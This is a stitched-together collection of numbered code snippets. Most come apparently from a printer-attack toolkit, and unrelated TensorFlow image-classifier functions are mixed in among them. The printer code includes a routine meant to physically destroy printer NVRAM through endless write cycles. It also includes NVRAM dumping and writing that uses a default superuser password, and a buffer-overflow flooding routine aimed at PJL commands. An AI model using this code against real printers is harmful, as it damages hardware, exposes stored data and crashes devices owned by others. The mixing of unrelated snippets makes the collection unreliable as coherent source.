Example #1
0
 def do_destroy(self, arg):
   "Cause physical damage to printer's NVRAM."
   # DESTRUCTIVE: hammers the COPIES variable until the NVRAM cell wears
   # out. Warns loudly and gives the user 10 seconds to abort first.
   self.logger.warning("Warning: This command tries to cause physical damage to the")
   self.logger.warning("printer NVRAM. Use at your own risk. Press CTRL+C to abort.")
   if self.logger.countdown("Starting NVRAM write cycle loop in...", 10, self):
     self.chitchat("Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?")
     date = conv().now() # timestamp the experiment started
     steps = 100 # number of pjl commands to send at once
     # batch of COPIES writes with cycling values 0..steps-3, so every
     # round trips the NVRAM cell through changing data
     chunk = ['@PJL DEFAULT COPIES=' + str(n%(steps-2)) for n in range(2, steps)]
     for count in range(0, 10000000):
       # test if we can still write to nvram (probe every 10th batch only)
       if count%10 == 0:
         self.do_set("COPIES=42" + arg, False)
         copies = self.cmd('@PJL DINQUIRE COPIES') or '?'
         # NOTE(review): `copies` can never be falsy here because of the
         # `or '?'` fallback above -- only the '?' substring check fires.
         if not copies or '?' in copies:
           self.logger.chitchat("I'm sorry Dave, I'm afraid I can't do that.")
           if count > 0: self.logger.chitchat("Device crashed?")
           return
         elif not '42' in copies:
           # readback no longer matches what we set -> NVRAM cell is dead
           self.chitchat("\rI'm afraid. I'm afraid, Dave. Dave, my mind is going...")
           dead = conv().elapsed(conv().now() - date)
           self.logger.printAndWrite("NVRAM died after " + str(count*steps) + " cycles, " + dead)
           return
       # force writing to nvram by setting a variable many times per batch
       self.chitchat("\rNVRAM write cycles:  " + str(count*steps), '')
       self.cmd(c.EOL.join(chunk) + c.EOL + '@PJL INFO ID')
   print # echo newline if we get this far (Python 2 print statement)
Example #2
0
 def do_nvram(self, arg):
   "Dump, read or write the device's NVRAM:  nvram <dump [all]|read addr|write addr value>"
   # dump nvram
   if arg.startswith('dump'):
     bs = 2**9    # memory block size used for sampling
     max = 2**18  # maximum memory address for sampling (NOTE: shadows builtin max)
     steps = 2**9 # number of bytes to dump at once (feedback-performance trade-off)
     lpath = os.path.join('nvram', self.basename(self.target)) # local copy of nvram
     #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
     # ******* sampling: populate memspace with valid addresses ******
     # any extra word after 'dump' triggers full address-space sampling
     if len(re.split("\s+", arg, 1)) > 1:
       memspace = []
       commands = ['@PJL RNVRAM ADDRESS=' + str(n) for n in range(0, max, bs)]
       self.chitchat("Sampling memory space (bs=" + str(bs) + ", max=" + str(max) + ")")
       for chunk in (list(chunks(commands, steps))):
         str_recv = self.cmd(c.EOL.join(chunk))
         # break on unsupported printers
         if not str_recv: return
         # collect valid memory addresses
         blocks = re.findall('ADDRESS\s*=\s*(\d+)', str_recv)
         for addr in blocks: memspace += range(conv().int(addr), conv().int(addr) + bs)
         self.chitchat(str(len(blocks)) + " blocks found. ", '')
     else: # use fixed memspace (quick & dirty but might cover interesting stuff)
       # NOTE(review): list concatenation of range() results -- Python 2 only
       memspace = range(0, 8192) + range(32768, 33792) + range(53248, 59648)
     #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
     # ******* dumping: read nvram and write copy to local file ******
     commands = ['@PJL RNVRAM ADDRESS=' + str(n) for n in memspace]
     self.chitchat("Writing copy to " + lpath)
     if os.path.isfile(lpath): file().write(lpath, '') # empty file
     for chunk in (list(chunks(commands, steps))):
       str_recv = self.cmd(c.EOL.join(chunk))
       if not str_recv: return # break on unsupported printers
       else: self.makedirs('nvram') # create nvram directory
       # every DATA=<n> in the reply is one byte of nvram content
       data = ''.join([conv().chr(n) for n in re.findall('DATA\s*=\s*(\d+)', str_recv)])
       file().append(lpath, data) # write copy of nvram to disk
       self.logger.dump(data) # print asciified output to screen
     print
   #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
   # read nvram (single byte)
   elif arg.startswith('read'):
     arg = re.split("\s+", arg, 1)
     if len(arg) > 1:
       arg, addr = arg
       self.logger.info(self.cmd('@PJL RNVRAM ADDRESS=' + addr))
     else: self.help_nvram()
   #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
   # write nvram (single byte)
   elif arg.startswith('write'):
     arg = re.split("\s+", arg, 2)
     if len(arg) > 2:
       arg, addr, data = arg
       # SUPERUSER mode is required by some devices to allow the write
       self.cmd('@PJL SUPERUSER PASSWORD=0' + c.EOL
              + '@PJL WNVRAM ADDRESS=' + addr + ' DATA=' + data + c.EOL
              + '@PJL SUPERUSEROFF', False)
     else: self.help_nvram()
   else:
     self.help_nvram()
def LeNet3(input_tensor, keep_prob, training):
    """LeNet-style stack of grouped convolutions ending in a 43-channel
    map that is flattened and returned (no explicit dense head).

    `keep_prob` drives a single dropout layer mid-stack; `training` is
    forwarded to the project-level `conv` helper.
    """
    net = conv(input_tensor, training, filters=1, padding='VALID', name='conv1', G=1)
    net = conv(net, training, filters=20, strides=2, padding='VALID', name='conv2', G=1)
    net = tf.nn.dropout(net, keep_prob)  # regularize between the downsampling stages
    net = conv(net, training, filters=20, strides=2, padding='VALID', name='conv3', G=1)
    net = conv(net, training, filters=80, kernel_size=2, strides=2, padding='VALID', name='conv4', G=1)
    net = conv(net, training, filters=43, kernel_size=2, padding='VALID', name='conv5', G=1)
    return tf.contrib.layers.flatten(net)
def AllCNN32(input_tensor, keep_prob, training):
    """All-convolutional classifier for 32x32-style inputs, 43 classes.

    Three stride-2 convs, dropout, three more convs, dropout again, two
    1x1 convs, then a flattened dense layer producing the logits.
    """
    net = conv(input_tensor, training, filters=96, strides=2, name='conv1')
    net = conv(net, training, filters=96, strides=2, name='conv2')
    net = conv(net, training, filters=96, strides=2, name='conv3')
    net = tf.nn.dropout(net, keep_prob)  # first dropout stage
    net = conv(net, training, filters=192, strides=2, name='conv4')
    net = conv(net, training, filters=192, strides=2, name='conv5')
    net = conv(net, training, filters=192, kernel_size=1, strides=2, name='conv6')
    net = tf.nn.dropout(net, keep_prob)  # second dropout stage
    # 1x1 convolutions act as per-pixel fully-connected layers
    net = conv(net, training, filters=192, kernel_size=1, name='conv7')
    net = conv(net, training, filters=192, kernel_size=1, name='conv8')
    flat = tf.contrib.layers.flatten(net)
    return tf.layers.dense(flat, 43)
Example #5
0
def recv(dispatcher, domain, address, msg):
    """Datagram callback for the SNMP broadcast printer discovery.

    Decodes every SNMP message contained in `msg`, matches it against
    the broadcast request (module-level `pdu_send`) and, for printer
    devices, records the harvested properties in the module-level
    `results` dict keyed by the sender's IP address.
    """
    # one datagram may carry several BER-encoded messages back to back;
    # decoder.decode returns (message, remaining bytes)
    while msg:
        msg_recv, msg = decoder.decode(msg, asn1Spec=pmod.Message())
        pdu_recv = pmod.apiMessage.getPDU(msg_recv)
        # match response to request as we're broadcasting
        if pmod.apiPDU.getRequestID(pdu_send) == pmod.apiPDU.getRequestID(
                pdu_recv):
            ipaddr = address[0]
            device = '?'  # hrDeviceDescr
            uptime = '?'  # sysUpTime (human-readable)
            status = '?'  # prtConsoleDisplayBufferText
            prstat = 0    # first digit of hrDeviceStatus
            # retrieve device properties
            for oid, val in pmod.apiPDU.getVarBinds(pdu_recv):
                oid, val = oid.prettyPrint(), val.prettyPrint()
                # skip non-printer devices: hrDeviceType must be hrDevicePrinter
                if oid == '1.3.6.1.2.1.25.3.2.1.2.1' and val != '1.3.6.1.2.1.25.3.1.5':
                    return
                # harvest device information
                if oid == '1.3.6.1.2.1.25.3.2.1.3.1': device = val
                if oid == '1.3.6.1.2.1.1.3.0':
                    # sysUpTime is in 1/100 s ticks; convert to elapsed string
                    uptime = conv().elapsed(val, 100, True)
                if oid == '1.3.6.1.2.1.43.16.5.1.2.1.1': status = val
                if oid == '1.3.6.1.2.1.25.3.2.1.5.1' and val: prstat = val[:1]
            dispatcher.jobFinished(1)
            results[ipaddr] = [device, uptime, status, prstat]
Example #6
0
 def do_ls(self, arg):
   "List contents of virtual file system:  ls"
   # snapshot of the virtual pclfs: {name: (macro_id, size, date)}
   entries = self.dirlist()
   if not entries: # nothing has been uploaded so far
     self.logger.raw("This is a virtual pclfs. Use 'put' to upload files.")
   # emit one syntax-highlighted directory line per file, sorted by name
   for fname, (macro_id, fsize, fdate) in sorted(entries.items()):
     self.logger.pcldir(fsize, conv().lsdate(int(fdate)), macro_id, fname)
def LeNet4(input_tensor, keep_prob, training):
    """LeNet variant with a multi-scale head: features flattened from
    both pool2 and conv3 are concatenated, dropped out, and fed to a
    43-way dense classifier.
    """
    c1 = conv(input_tensor, training, filters=6, kernel_size=5, strides=1,
              padding='VALID', name='conv1', G=2)
    p1 = tf.layers.max_pooling2d(c1, pool_size=2, strides=2,
                                 padding='VALID', name='pool1')
    c2 = conv(p1, training, filters=16, kernel_size=5, strides=1,
              padding='VALID', name='conv2', G=4)
    p2 = tf.layers.max_pooling2d(c2, pool_size=2, strides=2,
                                 padding='VALID', name='pool2')
    c3 = conv(p2, training, filters=400, kernel_size=5, strides=1,
              padding='VALID', name='conv3', G=10)

    # Multi-scale fusion: mid-level (pool2) and high-level (conv3)
    # features are flattened and concatenated along axis 1.
    mid_feats = tf.contrib.layers.flatten(p2)
    high_feats = tf.contrib.layers.flatten(c3)
    fused = tf.concat([high_feats, mid_feats], 1)
    fused = tf.nn.dropout(fused, keep_prob)
    # NOTE(review): tf.layers.dense in TF1 expects a callable activation;
    # the string 'elu' may only be accepted via Keras compat -- confirm.
    return tf.layers.dense(fused, units=43, activation='elu')
Example #8
0
 def do_get(self, arg, lpath="", r=True):
     "Receive file:  get <file>"
     # prompt interactively when no remote path was supplied
     if not arg:
         arg = raw_input("Remote file: ")
     # default the local copy's name to the remote basename
     if not lpath:
         lpath = self.basename(arg)
     # r=True resolves the argument against the remote working directory
     remote = self.rpath(arg) if r else arg
     response = self.get(remote)
     if response == c.NONEXISTENT:
         return
     rsize, data = response
     lsize = len(data)
     # fix carriage return chars added by some devices
     if lsize != rsize:
         stripped = conv().nstrip(data)
         if len(stripped) == rsize:
             lsize, data = rsize, stripped
     # write to local file
     file().write(lpath, data)
     if lsize == rsize:
         print(str(lsize) + " bytes received.")
     else:
         self.size_mismatch(rsize, lsize)
Example #9
0
 def put(self, path, data):
   "Store data as a PCL macro and register it in the virtual pclfs."
   # the virtual fs is flat: only the basename is kept
   path = self.basename(path)
   pclfs = self.dirlist()
   if path in pclfs:
     # overwrite: re-use the macro id already assigned to this name
     macro_id = pclfs[path][0]
   else:
     # otherwise pick any macro id from the block range not yet taken
     macro_id = str(item(set(c.BLOCKRANGE).difference(self.idlist())))
   # abort if we have used up the whole macro id space
   if not macro_id:
     return self.logger.warning("Out of macro slots.")
   self.chitchat("Using macro id #" + macro_id)
   # register id, size and creation timestamp in the superblock
   pclfs[path] = [macro_id, str(len(data)), str(conv().now())]
   self.update_superblock(pclfs)
   # finally persist the payload as a pcl macro on the printer
   self.define_macro(macro_id, data)
Example #10
0
 def do_flood(self, arg):
   "Flood user input, may reveal buffer overflows: flood <size>"
   size = conv().int(arg) or 10000 # buffer size (characters), default 10000
   char = '0' # character to fill the user input
   # get a list of printer-specific variables to set
   self.chitchat("Receiving PJL variables.", '')
   lines = self.cmd('@PJL INFO VARIABLES').splitlines()
   variables = [var.split('=', 1)[0] for var in lines if '=' in var]
   self.chitchat(" Found " + str(len(variables)) + " variables.")
   # user input to flood = custom pjl variables and command parameters;
   # '[buffer]' is the placeholder replaced by the oversized payload below
   inputs = ['@PJL SET ' + var + '=[buffer]' for var in variables] + [
     ### environment commands ###
     '@PJL SET [buffer]',
     ### generic parsing ###
     '@PJL [buffer]',
     ### kernel commands ###
     '@PJL COMMENT [buffer]',
     '@PJL ENTER LANGUAGE=[buffer]',
     ### job separation commands ###
     '@PJL JOB NAME="[buffer]"',
     '@PJL EOJ NAME="[buffer]"',
     ### status readback commands ###
     '@PJL INFO [buffer]',
     '@PJL ECHO [buffer]',
     '@PJL INQUIRE [buffer]',
     '@PJL DINQUIRE [buffer]',
     '@PJL USTATUS [buffer]',
     ### device attendance commands ###
     '@PJL RDYMSG DISPLAY="[buffer]"',
     ### file system commands ###
     '@PJL FSQUERY NAME="[buffer]"',
     '@PJL FSDIRLIST NAME="[buffer]"',
     '@PJL FSINIT VOLUME="[buffer]"',
     '@PJL FSMKDIR NAME="[buffer]"',
     '@PJL FSUPLOAD NAME="[buffer]"']
   # send each command with the placeholder expanded to `size` fill chars;
   # a generous 10x timeout since a stressed device may respond slowly
   for val in inputs:
     self.logger.raw("Buffer size: " + str(size) + ", Sending: ", val + os.linesep)
     self.timeoutcmd(val.replace('[buffer]', char*size), self.timeout*10, False)
   self.cmd("@PJL ECHO") # check if device is still reachable
Example #11
0
 def echo2data(self, echo):
   "Decode a series of '@PJL ECHO <n>' responses back into raw data."
   # every decimal number following 'ECHO ' is one character code
   return ''.join(conv().chr(n) for n in re.findall("ECHO (\d+)", echo))
Example #12
0
 def file_exists(self, path):
   "Return the remote file's size, or c.NONEXISTENT if it is absent."
   response = self.cmd('@PJL FSQUERY NAME="' + path + '"', True, False)
   # an existing file answers with 'TYPE=FILE SIZE=<n>'
   sizes = re.findall("TYPE\s*=\s*FILE\s+SIZE\s*=\s*(\d*)", response)
   # first match (or the sentinel default), cast to int by the helper
   return conv().int(item(sizes, c.NONEXISTENT))
Example #13
0
# third party modules
try:
    from pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher
    from pysnmp.carrier.asyncore.dgram import udp
    from pysnmp.proto import api
    from pyasn1.codec.ber import encoder, decoder
    snmp_modules_found = True
except ImportError:
    snmp_modules_found = False

########################################################
### Most of this code comes from the PySNMP examples ###
### and needs to be refactored into an 'snmp' class! ###
########################################################

start = conv().now()  # timestamp when discovery started (for elapsed-time display)
timeout = 0.5  # response wait in seconds -- be quick and dirty
maxhost = 999  # maximum number of printers to list
results = {}  # ipaddr -> [device, uptime, status, prstat], filled by recv()

try:
    # use snmp v1 because it is most widely supported among printers
    pmod = api.protoModules[api.protoVersion1]
    pdu_send = pmod.GetRequestPDU()  # build protocol data unit (pdu)
except Exception:
    # 'api' is unbound when the pysnmp imports above failed, which raises
    # NameError here; Exception covers that case. A bare 'except:' would
    # also swallow KeyboardInterrupt/SystemExit, so avoid it.
    pass


# Raised by the timer callback to break out of the dispatcher loop once
# the discovery timeout has elapsed.
class stop_waiting(Exception):
    """Signal that we are done waiting for SNMP responses."""